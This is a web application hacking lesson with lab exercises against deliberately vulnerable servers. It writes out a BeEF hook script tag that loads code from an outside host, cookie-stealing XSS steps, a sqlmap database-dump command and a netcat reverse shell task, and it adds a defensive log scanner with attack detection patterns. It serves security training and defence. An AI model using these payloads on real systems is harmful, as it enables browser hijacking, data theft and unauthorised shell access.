Lesson 4: Introduction to Hacking Web Applications

A few popular vulnerable operating systems that you can use (free) to build a hacking lab and practice your skills are:

Additional vulnerable servers and websites that you can use to practice are located at the GitHub repository for The Art of Hacking Training.

All of these are great sources to test various types of attacks against, including the tools available within Kali Linux.


Exercise 4.1

  1. Install Damn Vulnerable Web App (DVWA) in a VM (VirtualBox or VMWare).
  2. Run an nmap scan from your Kali Linux VM to find out all the ports open in that VM.
  3. Become familiar with the tool called Nikto and launch the tool against the DVWA VM.

# nikto -host <ip_address_of_dvwa_host>


Exercise 4.2

  1. Install WebGoat on a VM, Docker container, or physical bare metal machine (up to you ;-) ).
  2. WebGoat is a monster and a super useful framework for you to learn about tons of web application vulnerabilities and related attacks. I strongly suggest going over all of the lessons and challenges there. They provide step-by-step instructions on how to perform each attack.

Exercise 4.3

  1. Become familiar with BurpSuite.
  2. Start BurpSuite.
  3. Choose Temporary project and click Next.
  4. Choose Use Burp defaults and click Start Burp.
  5. Click on the Proxy tab, then Intercept. Make sure Intercept is Off.
  6. Set Firefox in Kali to use BurpSuite as a proxy and disable captive portal detection. Using Firefox on Kali, browse to about:config. Choose I Accept the Risk. Search for captive. Set network.captive-portal-service.enabled to false. Proxy settings can be found in Open Menu → Preferences → Advanced → Network → Configure how Firefox connects to the Internet → Settings...
  7. Select Manual proxy configuration and make sure HTTP Proxy is set to localhost and port 8080.
  8. Using Firefox, browse to http://<your_dvwa_ip_address>/dvwa. You should see the request show up in BurpSuite under HTTP History.
  9. Change the Security Level of DVWA to Low. This can be found in DVWA Security.
  10. Start the beef-xss service:

# service beef-xss start

  11. Make sure you can reach the BeEF UI authentication page at http://localhost:3000/ui/authentication

Note: With the default proxy settings, requests to localhost are not sent through BurpSuite.

  12. Log in with the username beef and password beef.
  13. In a new tab, navigate to XSS Reflected. You can view the PHP source code by clicking the View Source button at the bottom of the page. Try placing your name in the text box and click Submit. From looking at BurpSuite, how was your name sent to the server? Trigger a reflected XSS alert and print out the current document cookie.
  14. Navigate to XSS Stored. Figure out a way to insert a BeEF hook:

<script src="http://192.168.1.2:3000/hook.js" type="text/javascript"></script>

  15. From the BeEF UI, see if the Windows browser is hooked. If not, figure out why not.
  16. Type your name and a message from Windows in the message field and store it.
  17. What version of Firefox is running on the hooked Windows browser?
  18. What is the size of the screen?
  19. See if you can see the characters that were entered in Windows from the BeEF UI. You may need to refresh the log.
  20. Create a prompt dialog with the message of your choice (Commands → Browser → Hooked Domain).
  21. Finally, get the hooked browser's cookie.

Exercise 4.4

  1. Navigate to SQL Injection. Enumerate users on the system with an SQL injection.
  2. Use SQLMap to dump the database.

# sqlmap --cookie="<cookie>" --url="http://metasploitable/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --string="surname" --dump
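
The defender's counterpart to Exercises 4.3 and 4.4, as an added example that is not part of the original lesson or of DVWA, BeEF or sqlmap: a small Python scanner that flags the reflected XSS, BeEF hook and SQL injection requests above in the DVWA host's Apache access log. The log lines, the IP addresses and the sqlmap User-Agent string are constructed for the example; the hook URL and the sqli URL are the ones used in the exercises.

```python
"""Flag the lab payloads from Exercises 4.3 and 4.4 in the DVWA host's Apache access log.
Added example for the defender side of this lab (not code from the page, DVWA, BeEF or sqlmap);
the log lines are constructed, using the hook URL and sqli URL from the exercises."""
import re
from urllib.parse import unquote_plus

# Apache "combined" format: ip - user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Rules run against the URL-decoded request path (payloads arrive percent-encoded).
# Caveat: only the query string is visible here; DVWA's stored XSS and command execution
# forms submit by POST, and the default access log does not record request bodies.
PATH_RULES = [
    ("beef_hook", re.compile(r"<script[^>]*src=[^>]*hook\.js", re.I)),
    ("reflected_xss", re.compile(r"<script|onerror\s*=|document\.cookie", re.I)),
    ("sqli", re.compile(r"union\s+select|\b(?:or|and)\s+'?1'?\s*=\s*'?1|'\s*--", re.I)),
]
# sqlmap announces itself in the User-Agent unless told otherwise.
UA_RULES = [("sqlmap_ua", re.compile(r"\bsqlmap\b", re.I))]

SAMPLE_LOG = [  # constructed: 10.0.0.5 plays the Kali VM, 10.0.0.9 a normal user
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"',
    '10.0.0.5 - - [01/Jan/2024:10:02:17 +0000] "GET /dvwa/vulnerabilities/xss_r/?name=%3Cscript+src%3D%22http%3A%2F%2F192.168.1.2%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 1601 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"',
    '10.0.0.5 - - [01/Jan/2024:10:05:42 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+or+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"',
    '10.0.0.5 - - [01/Jan/2024:10:06:03 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 2210 "-" "sqlmap/1.2 (http://sqlmap.org)"',
    '10.0.0.9 - - [01/Jan/2024:10:07:30 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 1980 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/60.0"',
]

def classify(line):
    """Return the sorted indicator labels matched by one log line ([] if clean or unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path = unquote_plus(m.group("path"))
    hits = {label for label, rx in PATH_RULES if rx.search(path)}
    hits |= {label for label, rx in UA_RULES if rx.search(m.group("ua"))}
    return sorted(hits)

def summarize(lines):
    """Aggregate indicators per source IP so one attacking host raises one alert."""
    per_ip = {}
    for line in lines:
        for label in classify(line):
            per_ip.setdefault(line.split(" ", 1)[0], set()).add(label)
    return {ip: sorted(labels) for ip, labels in per_ip.items()}

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

On the sample log the Kali host is reported once with all four indicators while the normal user produces no alert.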


Exercise 4.5

  1. Navigate to Command Execution.
  2. Inject the command id. What user is PHP running as?
  3. Spawn a reverse shell using netcat.

Exercise 4.6

Complete the Metasploit Unleashed Training Exercises for Web Application Exploit Development.

This is a great resource by the folks from Offensive Security.


Exercise 4.7

  1. Launch the OWASP zaproxy and perform a scan against your vulnerable server. These videos may be useful, as are, of course, the demos that I showed you during the training.
  2. Did you find similar vulnerabilities?
  3. Use zaproxy as a proxy and intercept the data sent to your victim.
